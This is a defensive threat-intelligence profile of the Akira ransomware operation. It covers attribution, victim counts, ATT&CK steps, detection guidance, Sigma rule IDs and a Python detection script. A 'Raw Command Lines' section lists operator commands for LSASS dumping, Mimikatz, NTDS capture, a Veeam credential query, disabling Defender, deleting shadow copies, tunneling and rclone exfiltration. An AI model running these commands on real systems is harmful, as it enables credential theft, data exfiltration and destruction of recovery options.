# Akira Ransomware (Storm-1567 / Howling Scorpius / GOLD SAHARA)

- **Type:** Ransomware-as-a-Service (RaaS) - Closed Affiliate Model
- **Also tracked as:** Storm-1567 (Microsoft), Howling Scorpius (Palo Alto/Unit 42), GOLD SAHARA (Secureworks), Punk Spider (CrowdStrike)
- **First observed:** March 2023
- **Status:** Active - #2 most prolific RaaS operation Q1 2026 (194 victims). $244M in total ransom proceeds as of late September 2025. FBI/CISA joint advisory updated November 2025. No law enforcement disruption to date.

---

## Threat Overview

Closed RaaS with Conti lineage, operating since March 2023. Blockchain analysis (Arctic Wolf) confirmed $600K+ in ransom payments routed to Conti-affiliated wallets. The code shares its ChaCha encryption implementation, string obfuscation routines, and identical file extension exclusion lists with Conti. TRM Labs assesses the developers are Russia-based, though Akira's malware notably lacks the typical CIS keyboard layout check - possibly to obscure attribution.

**Double extortion:** data exfiltration via Rclone/WinSCP/FileZilla, then encryption via a ChaCha20 + RSA-4096 hybrid. Leak site: retro ASCII-art terminal aesthetic (Tor). Connected to Fog and Frag ransomware via shared Defiway bridge laundering infrastructure (TRM Labs).

| Field | Value |
|---|---|
| Ransom note | `akira_readme.txt` / `powerranges.txt` / `akiranew.txt` |
| File extension | `.akira`, `.powerranges` (Megazord), `.akiranew` (v2) |
| Contact | Tor negotiation portal |
| Encryption | ChaCha20 + RSA-4096 (Windows), AES/CAMELLIA/DES/IDEA (Linux/ESXi) |
| Top targets (geo) | US, Canada, Brazil, Australia, UK, Germany |
| Top targets (sector) | Manufacturing, professional services, technology, education, finance, healthcare |
| Avg dwell time | <4 hours typical, sub-1-hour observed (Halcyon) |
| Variants | Windows C++ (original), Megazord (Rust), Akira_v2 (Rust), Linux/ESXi C++ |

---

## Activity Standing

Among the volume leaders. Q1 2026: **Qilin** (342 victims), **Akira** (194), LockBit5, SafePay, Sinobi.
Monthly breakdown: 71 (Jan) → 39 (Feb) → 84 (Mar) - the February dip suggests temporary disruption, not decline; the March rebound more than doubled February's output.

Total leak site victims: ~1,420 (ransomware.live), ~980 of them posted in 2025 alone, making Akira the most prolific ransomware group by total ransom proceeds in 2025 ($150M in 2025; $244M cumulative). In March 2026, Akira dropped 30+ victims on its leak site in a single day. The retro ASCII-art styled leak site differentiates it from competitors.

Blockchain analysis (Arctic Wolf) links ransom payments directly to Conti-affiliated wallet addresses - at least three transactions totaling $600K+ USD sent to Conti wallets. Code similarities (ChaCha encryption implementation, string obfuscation, avoided file extensions) confirm shared developer lineage. TRM Labs assesses the developers are likely Russia-based.

---

## Initial Access

**Primary:** Compromised VPN credentials targeting Cisco ASA/FTD without MFA. Exploits CVE-2023-20269 (Cisco ASA/FTD zero-day allowing brute force without rate limiting) and CVE-2020-3259 (Cisco information disclosure). No successful attacks observed against orgs with properly configured MFA (Rapid7, Arctic Wolf).

**Secondary:** Veeam exploitation - CVE-2023-27532 (credential extraction, CVSS 7.5) and CVE-2024-40711 (unauthenticated RCE, CVSS 9.8). SonicWall VPN via CVE-2024-40766. Spear phishing. IAB-purchased access.

**Scale:** 250+ organizations compromised as of the April 2024 FBI advisory. 1,420+ total victims through Q1 2026.

---

## Infection Chain

### Step 1 - Initial Access: VPN Credential Exploitation

T1078, T1190 | Operator

Brute force or credential stuffing against Cisco ASA/FTD VPN endpoints lacking MFA. CVE-2023-20269 enables unlimited brute force attempts against AAA functions without rate limiting. Also exploits Veeam Backup & Replication (CVE-2023-27532, CVE-2024-40711) and SonicWall VPN (CVE-2024-40766) as alternative vectors. IAB-purchased access supplements direct exploitation.
> **Detection:** VPN brute force lives in network/auth logs, not endpoint telemetry. Monitor VPN concentrator logs for high-volume authentication failures from single sources, and correlate successful VPN logins with anomalous post-authentication behavior (e.g., RDP to multiple hosts within minutes of VPN connect, especially outside business hours).

### Step 2 - Reconnaissance

T1018, T1016, T1033, T1087.002 | Operator

Standard hands-on-keyboard (HOK) discovery: `net group "Domain Admins"`, `nltest /dclist:`, `whoami`, `ipconfig /all`. Uses AdFind for LDAP enumeration, SoftPerfect Network Scanner / Advanced IP Scanner for host discovery, `fsutil fsinfo drives` for volume enumeration, and `Get-ADComputer -Filter *` for domain inventory.

> **Detection:** Alert on domain trust enumeration via `nltest /dclist` and `nltest /domain_trusts`. Detect privileged group enumeration commands (`net group "Domain Admins"`, `net localgroup administrators`). Flag AdFind execution - any `adfind.exe` process with LDAP query arguments is high-fidelity. Watch for deployment or execution of network scanning tools (SoftPerfect `netscan.exe`, Advanced IP Scanner) on endpoints where they are not expected.
>
> See rule(s): [[edr-win-disc-net-priv-group-enum]] | [[edr-win-disc-nltest-domain-trusts]] | [[edr-win-disc-adfind-enum]] | [[edr-win-disc-netscan-deployment]]

### Step 3 - Credential Access

T1003.001, T1003.003, T1558.003, T1555 | Operator

LSASS dump via comsvcs.dll (`rundll32.exe comsvcs.dll, MiniDump`). Mimikatz (`sekurlsa::logonPasswords`). Kerberoasting. NTDS.dit extraction via ntdsutil (`create full c:\Programdata\temp\Crashpad\Temp\abc`). Veeam credential extraction via `sqlcmd.exe` querying the VeeamBackup database or `Veeam-Get-Creds.ps1`. Registry hive dumps (SAM/SECURITY/SYSTEM).

> **Detection:** Detect LSASS memory dumps by watching for `rundll32.exe` loading `comsvcs.dll` with `MiniDump` in the command line. Alert on `sqlcmd.exe` querying the `VeeamBackup` database `Credentials` table - this is almost always malicious. Flag `ntdsutil` with `ifm` and `create full` arguments (offline AD database capture). Monitor for Kerberoasting patterns: high-volume TGS requests for SPNs with RC4 encryption from a single source. Detect registry hive dumps (`reg save HKLM\SAM`, `SECURITY`, `SYSTEM`).
>
> See rule(s): [[edr-win-cred-lsass-minidump]] | [[edr-win-cred-veeam-db-access]] | [[edr-win-cred-reg-hive-dump]]

### Step 4 - Persistence

T1136.001, T1133, T1219 | Operator

Creates local admin accounts (observed: `John`, `itadm`, `point`). Hides accounts from the Welcome screen via registry (`SpecialAccounts\UserList`). Deploys AnyDesk, LogMeIn, or RustDesk for persistent RMM access. Cloudflare tunnel (`cloudflared.exe tunnel run --token`). Ngrok or Ligolo-ng tunneling via nssm.exe as a fake "sysmon" service. Disables password expiry.

> **Detection:** Alert on local account creation via `net user /add` with subsequent addition to local administrators. Detect unexpected RMM tool installation (AnyDesk, LogMeIn, RustDesk) by process name or PE metadata on endpoints without sanctioned RMM. Flag reverse tunneling tools: `cloudflared.exe`, `ngrok.exe`, `ligolo`. Watch for `nssm.exe` installing services - especially when the service name mimics legitimate tools (e.g., "sysmon").
>
> See rule(s): [[edr-win-persist-rmm-deployment]] | [[edr-win-c2-reverse-tunneling]]

### Step 5 - Defense Evasion

T1562.001, T1562.004 | Both

PowerTool or KillAV abuse the Zemana AntiMalware driver to terminate AV/EDR processes at kernel level. Also uses the Terminator tool. Disables Windows Defender via PowerShell (`Set-MpPreference -DisableRealtimeMonitoring $true`). Adds Defender exclusions for `C:\`. Uninstalls EDR agents. Opens RDP via a netsh firewall rule. Deletes volume shadow copies via PowerShell WMI (`Get-WmiObject Win32_Shadowcopy | Remove-WmiObject`).
> **Detection:** Detect Defender tampering by monitoring for `Set-MpPreference` with `-DisableRealtimeMonitoring` or broad exclusion paths in PowerShell command lines. Alert on volume shadow copy deletion via WMI (`Win32_Shadowcopy` combined with `Delete` or `Remove-WmiObject`). For BYOVD-based EDR killers (PowerTool, KillAV, Terminator), monitor for loading of known vulnerable drivers (Zemana `zam64.sys`/`zamguard64.sys`) and for processes with display names matching these tools. This remains a detection gap across most EDR platforms - kernel-level driver abuse requires driver load monitoring and vulnerable driver blocklisting.
>
> See rule(s): [[edr-win-def-defender-tampering]] | [[edr-win-impact-inhibit-recovery]]

### Step 6 - Lateral Movement

T1021.001, T1021.002, T1047 | Operator

RDP with compromised domain admin credentials (primary - 100+ RDP sessions observed in a single intrusion). SMB for file transfer. Impacket wmiexec.py for remote command execution. Remote service creation. Cobalt Strike Beacon for C2-directed movement.

> **Detection:** Detect Impacket-style remote execution by alerting on WMI process creation from `wmiprvse.exe` spawning `cmd.exe` with encoded or suspicious command lines. Flag remote PsExec-style service creation. Monitor for anomalous RDP session volume from single accounts - 100+ RDP sessions from one account in a short window is a strong lateral movement indicator. Detect SMB-based file transfers of executables or scripts to `ADMIN$` or `C$` shares.
>
> See rule(s): [[edr-win-lat-impacket-wmiexec]] | [[edr-win-lat-remote-psexec]]

### Step 7 - Exfiltration

T1048, T1560.001, T1567 | Operator

Data staging with WinRAR (`WinRAR.exe a -ep1 -scul -r0`). Exfiltration via Rclone, WinSCP, FileZilla, or MegaSync to attacker-controlled cloud storage. Filters for high-value extensions (docx, xlsx, pdf, pst, mdb). Exfil completed in as little as 2 hours from initial access.

> **Detection:** Detect Rclone via PE metadata and command-line patterns (`copy`, `sync` with `remote:` arguments) rather than filename - renamed variants are common. Watch for WinRAR command lines with recursive archiving of high-value file types. Alert on bulk outbound data transfers to cloud storage services (Mega, unknown WebDAV/S3 endpoints). Monitor for WinSCP or FileZilla execution on servers where these tools are not standard.
>
> See rule: [[edr-win-exfil-rclone-usage]]

### Step 8 - Impact (Encryption)

T1486, T1490 | Malware

Windows: `w.exe -p=<path> -n=2` or `Akira.exe --encryption_percent=10`. ChaCha20 + RSA-4096 hybrid - partial encryption of large files (.vmdk, databases) for speed. Megazord variant (Rust): `.powerranges` extension, 85+ service termination commands. Akira_v2 (Rust): `.akiranew`, Build ID required for execution, `vmonly`/`stopvm` ESXi modes. Linux/ESXi variant targets VMware infrastructure directly.

> **Detection:** Monitor for mass file renaming with known ransomware extensions. Alert on volume shadow copy deletion (pre-encryption indicator). Detect mass service/process termination sequences - Akira kills 85+ services before encryption. On ESXi, watch for unauthorized `esxcli vm process kill` or `vim-cmd vmsvc/power.off` commands. Behavioral ransomware detection (rapid sequential file writes with entropy changes) is the primary coverage - static signatures for encryptor binaries are trivially evaded via recompilation.
>
> See rule: [[edr-win-impact-inhibit-recovery]]

---

## Raw Command Lines

Observed operator commands from the CISA advisory (AA24-109A), Sophos, Kroll, Unit 42, and IBM X-Force IR reports. `[R]` = reconstructed from described behavior.

**Reconnaissance**

```
whoami
ipconfig /all
nltest /dclist:
net group "Domain Admins" /domain
fsutil.exe fsinfo drives
Get-ADComputer -Filter * -Properties *
cmd.exe /c "%TMP%\adfind.exe" -f objectcategory=computer -csv name cn OperatingSystem dNSHostName
```

**Credential access**

```
cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 572 C:\ProgramData\lsass.dmp full
%TMP%\mimikatz22020220919x64.exe "privilege::debug" "sekurlsa::logonPasswords" exit
ntdsutil "ac i ntds" "ifm" "create full c:\Programdata\temp\Crashpad\Temp\abc" q q
cmd.exe /c C:\ProgramData\Cl.exe -c -i C:\Windows\NTDS\ntds.dit -o C:\programdata\nt.txt
sqlcmd.exe -S localhost,60261 -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc] FROM [VeeamBackup].[dbo].[Credentials];"
```

**Account creation**

```
net.exe user /add John Jhn1234Abc!
net localgroup administrators John /add
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f [R]
```

**Defense evasion**

```
Set-MpPreference -DisableRealtimeMonitoring $true
powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"
netsh.exe advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
```

**Persistence / tunneling**

```
C:\ProgramData\cloudflared.exe tunnel run --token [REDACTED]
nssm.exe install sysmon C:\ProgramData\sysmon.exe [R]
```

**Lateral movement**

```
wmiexec.py DOMAIN/admin:[email protected] [R]
```

**Exfiltration**

```
"C:\Program Files\WinRAR\WinRAR.exe" a -ep1 -scul -r0 [R]
rclone copy \\<FILESERVER>\shares remote:exfil-bucket --include "*.docx" --include "*.xlsx" --include "*.pdf" --include "*.pst" --transfers 16 [R]
```

**Encryption**

```
C:\ProgramData\w.exe -p=C:\Users\%USERNAME%\Desktop\MyFiles -n=2
Akira.exe --encryption_percent=10
powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"
```

---

## Intelligence Gaps

- **Affiliate structure opaque** - Closed model but affiliate boundaries unclear. Shared Defiway infrastructure with Fog and Frag suggests operational cooperation - unclear if same affiliates or resource-sharing.
- **PowerTool/KillAV mechanics underdocumented** - CISA confirms Zemana driver abuse but no public analysis of exact IOCTLs or driver hashes. Cannot build precise BYOVD detection without them.
- **Conti lineage depth unknown** - Blockchain confirms financial links. Code confirms shared routines. Whether Akira is a Conti rebrand, a fork by ex-Conti developers, or a separate group using Conti source code remains unresolved.
- **Sub-1-hour dwell cases** - Halcyon documented full kill chain in under an hour.
  If this is the norm rather than the exception, traditional hunt cadence (daily/weekly) is insufficient.
- **Megazord vs Akira_v2 deployment logic** - Actors use both interchangeably (CISA). No public analysis of affiliate selection criteria between variants.
- **No OFAC sanctions** - Despite $244M in proceeds and a joint FBI/CISA advisory, no sanctions, indictments, or disruption operations. Enforcement posture may change.

---

## Confidence Assessment

| Claim | Confidence | Evidence | Flips if... |
|---|---|---|---|
| Conti developer lineage | HIGH | Arctic Wolf blockchain ($600K+ to Conti wallets), code overlap (ChaCha, string obfuscation) | Conti source code widely leaked - could be independent fork |
| Russia-based developers | MEDIUM | TRM Labs assessment, CIS targeting exclusions absent (unusual) | Deliberate misdirection re: keyboard checks |
| RaaS closed model | HIGH | CISA advisory, consistent TTPs across incidents | Public affiliate recruitment surfaces |
| $244M cumulative proceeds | HIGH | FBI/CISA AA24-109A (Nov 2025 update), TRM blockchain | Self-reported/inflated by duplicate counting |
| Fog/Frag operational link | MEDIUM | Shared Defiway bridge, wallet clustering (TRM Labs) | Infrastructure purchased on open market |
| Q1 2026 #2 by volume | HIGH | Ransomware.live, Breachsense, Ransom-DB concordance | Leak site counts != actual victims |

---

## Detections

Sigma rules applicable to this threat:

| Rule ID | Description |
|---|---|
| [[edr-win-disc-net-priv-group-enum]] | Privileged Domain Group Enumeration via Net |
| [[edr-win-disc-nltest-domain-trusts]] | Domain Trust Enumeration via Nltest |
| [[edr-win-disc-adfind-enum]] | AdFind LDAP Enumeration |
| [[edr-win-disc-netscan-deployment]] | SoftPerfect Network Scanner Execution |
| [[edr-win-cred-lsass-minidump]] | LSASS Memory Dump via Comsvcs.dll |
| [[edr-win-cred-veeam-db-access]] | Veeam Backup Credential Database Access |
| [[edr-win-cred-reg-hive-dump]] | Registry Hive Credential Dump |
| [[edr-win-lat-impacket-wmiexec]] | Impacket WmiExec Lateral Movement |
| [[edr-win-lat-remote-psexec]] | Remote PsExec Service Execution |
| [[edr-win-exfil-rclone-usage]] | Rclone Data Exfiltration |
| [[edr-win-impact-inhibit-recovery]] | System Recovery Inhibition |
| [[edr-win-def-defender-tampering]] | Windows Defender Tampering via PowerShell |
| [[edr-win-c2-reverse-tunneling]] | Reverse Tunnel Tool Execution |
| [[edr-win-persist-rmm-deployment]] | Unauthorized RMM Tool Deployment |

---

## Key Publications

1. [CISA/FBI - #StopRansomware: Akira Ransomware (AA24-109A)](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a) (Apr 2024, updated Nov 2025)
2. [Arctic Wolf - Conti and Akira: Chained Together](https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/) (2023)
3. [Sophos - Akira, Again: The Ransomware That Keeps on Taking](https://www.sophos.com/en-us/blog/akira-again-the-ransomware-that-keeps-on-taking) (Dec 2023)
4. [Unit 42/Palo Alto - Howling Scorpius Threat Assessment](https://unit42.paloaltonetworks.com/threat-assessment-howling-scorpius-akira-ransomware/) (2024)
5. [Cisco Talos - Akira Ransomware Continues to Evolve](https://blog.talosintelligence.com/akira-ransomware-continues-to-evolve/) (2023)
6. [TRM Labs - Akira Ransomware Group: Threat Profile](https://www.trmlabs.com/resources/intel-library/akira) (2025)
7. [Trend Micro - Ransomware Spotlight: Akira](https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-akira) (2024)
8. [Kroll - Akira Ransomware Deep Dive](https://www.kroll.com/en/publications/cyber/akira-ransomware-deep-dive) (Q4 2023)
9. [Halcyon - Akira Ransomware Attacks in Under an Hour](https://www.halcyon.ai/ransomware-research-reports/akira-ransomware-attacks-in-under-an-hour) (2024)
10. [Picus - Akira Ransomware Analysis and Simulation](https://www.picussecurity.com/resource/blog/akira-ransomware-analysis-simulation-and-mitigation-cisa-alert-aa24-109a) (2025)
11. [Ransomware.live - Akira Tracker](https://www.ransomware.live/group/akira) (ongoing)
12. [Breachsense - March 2026 Ransomware Report](https://www.breachsense.com/ransomware-reports/march-2026/) (Mar 2026)
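One way to turn the per-step detection notes and the Detections table into a runnable check, as an added example that is not from the advisory or from any vendor's Sigma rules: process command-line heuristics keyed to the rule IDs above, run over constructed sample events that include the raw command lines from this page. The regexes, the host names, the renamed-binary rclone case and the `ntdsutil` label (which has no rule ID on the page) are assumptions.

```python
import re

# Added example, not from the advisory or any vendor's rules: the Detection
# notes above as command-line heuristics keyed to the Detections table IDs.
RULES = [
    ("edr-win-cred-lsass-minidump", r"comsvcs\.dll.*MiniDump"),
    ("edr-win-cred-veeam-db-access", r"sqlcmd.*VeeamBackup.*Credentials"),
    ("edr-win-cred-reg-hive-dump",
     r"\breg(\.exe)?\s+save\s+\"?HKLM\\(SAM|SECURITY|SYSTEM)\b"),
    ("ntdsutil-ifm-capture (detection note only, no rule ID on page)",
     r"ntdsutil.*\bifm\b.*create full"),
    # Enumeration only: the same verbs with /add are account manipulation.
    ("edr-win-disc-net-priv-group-enum",
     r"^(?!.*/add).*\bnet(\.exe)?\s+(group \"Domain Admins\"|localgroup administrators)"),
    ("edr-win-def-defender-tampering",
     r"Set-MpPreference.*-DisableRealtimeMonitoring"),
    ("edr-win-impact-inhibit-recovery",
     r"Win32_Shadowcopy.*(Remove-WmiObject|\.Delete\(\))"),
    ("edr-win-c2-reverse-tunneling",
     r"\b(cloudflared(\.exe)?\s+tunnel|ngrok(\.exe)?\b|ligolo)"),
    # Rclone grammar (verb, source, remote:path) rather than file name, since
    # renamed binaries are common; a 2+ letter remote name skips C:\ paths.
    ("edr-win-exfil-rclone-usage",
     r"\b(copy|sync)\s+\S+\s+[A-Za-z][\w-]+:\S*"),
]
COMPILED = [(rid, re.compile(rx, re.I)) for rid, rx in RULES]

def classify(cmdline):
    """Return the rule IDs whose heuristic matches one process command line."""
    return [rid for rid, rx in COMPILED if rx.search(cmdline)]

def scan(events):
    """Group matching events by rule ID: {rule_id: [(host, cmdline), ...]}."""
    hits = {}
    for ev in events:
        for rid in classify(ev["cmdline"]):
            hits.setdefault(rid, []).append((ev["host"], ev["cmdline"]))
    return hits

# Constructed sample telemetry: command lines from the section above, one
# renamed-binary exfil case, and benign noise that must not fire.
SAMPLE_EVENTS = [
    {"host": "DC01", "cmdline": r"cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 572 C:\ProgramData\lsass.dmp full"},
    {"host": "VEEAM01", "cmdline": 'sqlcmd.exe -S localhost,60261 -E -y0 -Q "SELECT [user_name],[password] FROM [VeeamBackup].[dbo].[Credentials];"'},
    {"host": "DC01", "cmdline": r'ntdsutil "ac i ntds" "ifm" "create full c:\Programdata\temp\Crashpad\Temp\abc" q q'},
    {"host": "WS12", "cmdline": r"reg save HKLM\SAM C:\ProgramData\sam.hiv"},
    {"host": "WS12", "cmdline": 'net group "Domain Admins" /domain'},
    {"host": "WS12", "cmdline": "net localgroup administrators John /add"},
    {"host": "WS12", "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "WS12", "cmdline": 'powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"'},
    {"host": "FS01", "cmdline": r'C:\ProgramData\update.exe copy \\FS01\shares remote:exfil-bucket --include "*.pst" --transfers 16'},
    {"host": "FS01", "cmdline": r"xcopy C:\reports D:\archive /E"},
    {"host": "WS07", "cmdline": r"C:\ProgramData\cloudflared.exe tunnel run --token [REDACTED]"},
]
```

Each sample event trips exactly one heuristic, and the two benign lines (the `/add` account change, which belongs to persistence rather than enumeration, and the `xcopy` to a drive letter) trip none; a real deployment would feed `scan()` from Sysmon or EDR process-creation events and combine the rclone match with PE metadata as the Step 7 note advises.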